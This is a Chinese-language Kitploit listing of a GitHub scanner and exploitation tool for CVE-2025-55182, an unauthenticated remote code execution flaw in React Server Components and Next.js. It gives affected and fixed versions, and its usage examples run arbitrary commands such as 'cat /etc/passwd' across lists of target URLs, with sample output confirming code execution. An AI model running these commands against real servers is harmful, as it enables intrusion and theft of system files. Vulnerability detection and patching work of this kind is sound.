Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/qixinlee/cve-2025-55182-scanner
侦察漏洞扫描器漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubqixinlee/cve-2025-55182-scanner

CVE-2025-55182-Scanner

针对CVE-2025-55182的自动扫描器:React Server Components和Next.js中的一个严重RCE漏洞。

查看仓库
129个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182 RCE Scanner

针对 CVE-2025-55182 (React2Shell) 远程代码执行漏洞的批量检测与验证工具。

⚠️ CVSS 10.0 严重漏洞 | 影响 React Server Components 及 Next.js 15.x/16.x 版本 | 仅限授权安全测试使用

漏洞简介

CVE-2025-55182(又名 "React2Shell")是一个 CVSS 10.0 满分严重等级 的未经身份验证的远程代码执行 (RCE) 漏洞。

该漏洞源于 React Server Components (RSC) 的 react-server 包在处理 RSC "Flight" 协议时存在的不安全反序列化问题。攻击者可以通过发送特制的 HTTP 请求,在存在漏洞的服务器上执行任意代码。

由于 Next.js 使用了 RSC "Flight" 协议,因此即使是使用 create-next-app 创建的默认配置应用程序,也可能在开发者无需编写任何额外代码的情况下被利用。自 2025 年 12 月 5 日起,已监测到该漏洞被活跃利用

影响版本

React Server Components 受影响版本:

包名受影响的版本
react-server-dom-webpack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-parcel19.0.0, 19.1.0, 19.1.1, 19.2.0

Next.js 受影响版本(使用 App Router):

可能受影响的其他 RSC 框架/工具:

  • react-router
  • waku
  • @parcel/rsc
  • @vitejs/plugin-rsc
  • rwsdk
  • RedwoodJS(RSC 模式)

临时缓解措施

⚠️ 重要提示:此漏洞没有已知的临时缓解措施,升级到安全版本是唯一的修复方案。

推荐升级版本:

  • React: 升级到 19.0.1、19.1.2 或 19.2.1
  • Next.js: 升级到 16.0.7、15.5.7、15.4.8 或 15.3.6

可使用官方提供的 fix-react2shell-next npm 包协助更新受影响的 Next.js 应用。

安装依赖

root@kitploit:~
pip install requests

使用方法

基本用法

root@kitploit:~
# 批量扫描 (从urls.txt读取目标)
python CVE-2025-55182.py -f urls.txt

# 单目标测试
python CVE-2025-55182.py -u http://192.168.1.100:3000

自定义命令

root@kitploit:~
# 执行 whoami 命令
python CVE-2025-55182.py -f urls.txt -c "whoami"

# 执行 hostname 命令
python CVE-2025-55182.py -u http://target.com -c "hostname"

# 读取文件
python CVE-2025-55182.py -f urls.txt -c "cat /etc/passwd"

高级选项

root@kitploit:~
# 指定线程数和超时时间
python CVE-2025-55182.py -f urls.txt -t 50 --timeout 15

# 自定义输出文件
python CVE-2025-55182.py -f urls.txt -o scan_results.csv

# 静默模式 (只输出漏洞URL)
python CVE-2025-55182.py -f urls.txt -q

参数说明

URL文件格式

每行一个URL,例如:

root@kitploit:~
http://192.168.1.10:3000
http://192.168.1.11:3000

输出示例

root@kitploit:~
    +---------------------------------------------------------------+
    |   ###   ## #######  ##  ## ########       ## #######          |
    |   ####  ## ##       ## ##     ##          ## ##               |
    |   ## ## ## #####     ###      ##          ## #######          |
    |   ##  #### ##       ## ##     ##      ##  ##       ##         |
    |   ##   ### ####### ##   ##    ##       ####  #######          |
    |                                                               |
    |   CVE-2025-55182 RCE Scanner                                  |
    +---------------------------------------------------------------+

============================================================
  [ CONFIGURATION ]
============================================================
  > Targets: 10
  > Threads: 20
  > Command: id

============================================================
  [ SCANNING ]
============================================================
  [14:30:25] [VULN] http://192.168.1.10:3000
             '--> uid=1000(www-data)
  [14:30:26] [SAFE] http://192.168.1.11:3000

+==========================================================+
|                     SCAN COMPLETE                        |
+==========================================================+
|  Total Targets :    10                                   |
|  Vulnerable    :     1                                   |
|  Safe          :     9                                   |
|  Errors        :     0                                   |
+==========================================================+

输出文件

扫描结果保存为 CSV 格式,包含以下字段:

  • url - 目标URL
  • status - HTTP状态码
  • vulnerable - 是否存在漏洞
  • output - 命令执行输出
  • error - 错误信息

免责声明

本工具仅用于授权的安全测试,请勿用于非法用途。使用者需自行承担相关责任。

下载工具
主版本受影响的版本范围修复版本
16.0.x≤ 16.0.616.0.7
15.5.x≤ 15.5.615.5.7
15.4.x≤ 15.4.715.4.8
15.3.x≤ 15.3.515.3.6
15.2.x≤ 15.2.5-
15.1.x≤ 15.1.8-
15.0.x≤ 15.0.4-
14.x Canary≥ 14.3.0-canary.77-
参数说明默认值
-f, --fileURL列表文件urls.txt
-u, --url单个目标URL-
-t, --threads并发线程数20
--timeout请求超时(秒)10
-o, --output输出CSV文件results.csv
-c, --command执行的命令id
-q, --quiet静默模式false